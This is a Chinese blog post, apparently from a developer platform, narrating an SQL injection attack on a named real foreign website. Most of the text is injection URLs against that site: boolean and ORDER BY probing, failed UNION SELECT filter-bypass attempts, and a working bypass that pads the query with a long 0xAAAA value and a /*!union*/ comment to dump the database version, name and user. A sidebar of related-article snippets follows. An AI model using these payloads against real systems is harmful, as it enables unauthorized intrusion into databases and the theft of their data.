突破sql 注入过滤Union+SELECT 继续射下去

最新推荐文章于 2024-04-20 12:00:00 发布
最新推荐文章于 2024-04-20 12:00:00 发布
阅读量1.9k 收藏 2
点赞数

突破sql 注入过滤Union+SELECT 继续射下去
前几今天遇到一个bt 的老外注射点:
//ps 此点目前流行的注射工具射不 //
http://cleopatra-sy.com/index.php?content=more_product&id=17

http://cleopatra-sy.com/index.php?content=more_product&id=17 and 1=1 正常
http://cleopatra-sy.com/index.php?content=more_product&id=17 and 1=2 报错
http://cleopatra-sy.com/index.php?content=more_product&id=17 order by 6 正常
http://cleopatra-sy.com/index.php?content=more_product&id=17 order by 7 错误

继续按照常规的手法注射:
http://cleopatra-sy.com/index.php?content=more_product&id=-17+UNION+SELECT+1,2,
3,4,5,6–

错误nnd,过滤 UNION+SELECT 我们来加点特殊的字符看看能不能绕过
http://cleopatra-sy.com/index.php?content=more_product&id=-17+/////!uNiOn//**/
///!sElEcT////**/1,2,3,4,5,6–

悲剧还是绕不过去 - -,于是尝试自己知道的绕过方法继续射…
http://cleopatra-sy.com/index.php?content=more_product&id=-17+/U//n//i//o//*n
//*t/+/s//e//l//e//c//t/+1,2,3,4,5,6–

http://cleopatra-sy.com/index.php?content=more_product&id=-17+concat(u,n,i,o,n)+conca
t(s,e,l,e,c,t)+all+1,2,3,4,5,6–
悲剧还是绕不过去,nnd。找了几个朋友看了还是绕不过去邪恶的过滤啊。要是国内
的站以上几种方法一般都能搞定,老外就是bt。最后实在木有办法了只好去国外的黑
客论坛求助老外帮助。国外php 注射历史悠久手法独特+方法猥琐 射出几率相当高
于是发帖求助了终于有一个黑客回帖了而且轻松的绕过去了。
http://cleopatra-sy.com/index.php?content=more_product&id=-17 and (select 1)=(select
0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA)+/!union/+select+1,2,3,4,5,6–+-
靠,老外果然牛B 那么继续射
http://cleopatra-sy.com/index.php?content=more_product&id=-17 and (select 1)=(select
0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA)+/!union/+select+1,concat_ws(0x7c,version(),database(),u
ser()),3,4,5,6–+-
成功得到系统版本、当前数据库用户、用户名

LuoYedeZuoYouShang
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
6/7 SELECT语句:过滤(正则表达式REGEXP)
01-21 3068
说明 操作 REGEXP(正则表达式) LIKE替换成REGEXP . 表示匹配任意1个字符 LIKE与REGEXP 差别 以下为数据库SQLTEST中的三张表,其结构和内容如下: REGEXP(正则表达式): # 删除表记录 mysql> DELETE -> FROM t_stu_profile
sql注入用<>绕过被过滤select ——百度杯9月第二场SQL
ancan8807的博客
09-17 1万+
题目提示SQL注入,打开源代码发现<!--SELECT * FROM info WHERE id=1--> 尝试union select 1,2,3提示inj code! 经过多次尝试之后发现select已经被过滤,于是百度绕过select过滤的方法,/*!%53eLEct*/,发现依旧无法绕过select过滤 经过再次尝试后发现可以用<>进行绕过,于是构造...
Java菜鸟面试突破系列之SQL注入
Eleven-Seven工作小空间
07-12 406
SQL注入概念:所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如诸多网站用户信息泄露大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入攻击。 攻击步骤: a) 寻找注入点(如:登录界面、留言板等) b) 用户自己构造SQL语句(如:’ or 1=1#,后面会讲解) c) 将sql
sql注入(三)绕过方法及防御手段
最新发布
wangluoanquan111的博客
04-20 1149
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
SQL注入绕过select过滤
qq_43596950的博客
03-25 4514
原题目出自攻防世界收录的2019强网杯,官网已有writer up,此博文仅个人的做题笔记 原题目链接:adworld.xctf.org.cn select过滤可以考虑使用show显示表名和列名 http://ip:port/?inject= ';show databases;show tables;show columns from table; alter更改表名,利用源代码中的select进行查询 alter语句: ALTER TABLE 表名 CHANGE COLUMN 列名 【新】列名
SQL-labs的第27关——unionselect被屏蔽 报错注入(Get)
qq_73393033的博客
08-04 427
注意:该关的空格、注释也被屏蔽了。
sql注入讲解ppt.pptx
08-10
SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库...
Nginx中防止SQL注入攻击的相关配置介绍
09-30
在Nginx中防止SQL注入攻击是保护Web应用程序安全的重要环节。SQL注入是黑客利用恶意SQL语句侵入数据库的一种常见方法。以下是一些相关的配置介绍,这些配置可以帮助你阻止可能的SQL注入尝试。 首先,了解基本思路:...
输入值/表单提交参数过滤有效防止sql注入的方法
01-21
输入值/表单提交参数过滤,防止sql注入或非法攻击的方法: 复制代码 代码如下: /** * 过滤sql与php文件操作的关键字 * @param string $string * @return string * @author zyb <zyb> */ private function filter_...
深入了解SQL注入绕过waf和过滤机制
05-04
SQL注入过滤器的实现通常涉及关键词检测、编码检测和语义分析。绕过这些过滤器需要深入理解过滤机制的工作原理,例如了解WAF如何解析和匹配SQL语句,以及它对特殊字符和编码的处理方式。 0x04 延伸及测试向量示例 ...
ASP+ACCESS带SQL注入网站源码
05-20
在ASP+ACCESS的网站中,如果对用户输入的数据没有进行充分的验证和过滤,就可能导致SQL注入漏洞。 对于初学者来说,"ASP+ACCESS带SQL注入网站源码"是一个理想的实践平台,可以深入理解SQL注入的工作原理。你可以...
jquery通过select列表选择框对表格数据进行过滤示例
10-25
主要介绍了jquery通过select列表选择框对表格数据进行过滤示例,需要的朋友可以参考下
迈普交换机配置
02-06
迈普交换机配置aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
ECSHOP商城系统过滤不严导致SQL注入漏洞
盐碘
03-19 1540
添加时间: 2009-05-25 系统编号: WAVDB-01431 影响版本: ECSHOP 2.6.1/2.6.2 程序介绍:  ECSHOP是一款开源免费的网上商店系统。由专业的开发团队升级维护,为您提供及时高效的技术支持,您还可以根据自己的商务特征对ECSHOP进行定制,增加自己商城的特色功能。 漏洞分析: 文件includes/init.php判断g
9-Web安全——SQL注入WAF绕过之selectunion过滤
热门推荐
网络安全
06-03 1万+
1. selectunion过滤绕过 真实的注入环境中一般无法通过网站的源代码进行安全审计的,那么在注入过程中我们就需要使用常见的SQL注入绕过技巧来帮助我们进行绕过WAF。 首先需要判断网页的注入类型,输入参数?id=1%0Aand%0A1=2,测试URL为: http://www.sqli.com/Less-27/?id=1%0Aand%0A1=2 页面返回的结果如下: 当我们输入id=1 and 1=2时,页面还是正常返回,说明这是一个字符型注入。 然...
select查询之过滤和排序数据
weixin_43945486的博客
08-02 598
目录2.过滤和排序数据2.1 使用where子句比较运算2.2 between...and...2.3 in(set)表示在某些数值内2.4 like选择类似的值2.5 is (not) NULL判断空值2.6 AND 要求并的关系为真2.7 OR 要求或关系为真2.8 NOT2.9 ORDER BY子句排序 2.过滤和排序数据 2.1 使用where子句比较运算 select * from employees where department_id = 90; 比较运算 操作符:=、>、<、
sql注入过滤select_网站SQL注入渗透测试手法介绍
weixin_39628384的博客
11-26 1962
国庆即将到来,前一期讲到获取网站信息判断所属环境以及各个端口的用处和弱口令密码利用方法,这期仍有很多客户找到我们想要了解针对于SQL注入攻击的测试方法,这一期我们来讲解下注入的攻击分类和使用手法,让客户明白漏洞是如何产生的,会给网站安全带来怎样的影响!3.1 SQL注入漏洞3.1.1. 注入分类SQL注入是一种代码注入技术,用于攻击数据驱动的应用程序。在应用程序中,如果没有做恰当的过滤,则可能使得...
SQL 注入
BusyMonkey
06-06 713
https://www.oschina.net/code/snippet_811941_14131 //效验 protected static boolean sqlValidate(String str) { str = str.toLowerCase();//统一转为小写 String badStr = "'|and|exec|exec...
sql注入过滤关键字(union select等等)
没事我溜达
03-15 8487
今天来学习一下注入中关键字被过滤了该如何解决 打开靶场,这是我本地搭建的一个靶场所以没有靶场地址 我们在输入框内输入一个1 查询一下结果。 尝试闭合和注释,发现单引号即可完成闭合,--+作为注释内容,通过order by查询列数 看到页面上方order的or被过滤,说明or即是关键词,我们双写or,变成 oorrder by 2 (一定要在or的中间双写or,不然两个都会被注释掉) 通过order by发现只有两列数据,那么开始联合注入 ...
sql注入过滤select
07-28
SQL注入中,过滤select关键字是常见的安全措施之一。然而,有一些方法可以绕过这种过滤。一种方法是在过滤过滤的关键词前面加上URL编码的空字节%00。这是因为在C/C++中,空字节代表语句的结束,而SQL语句对空...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值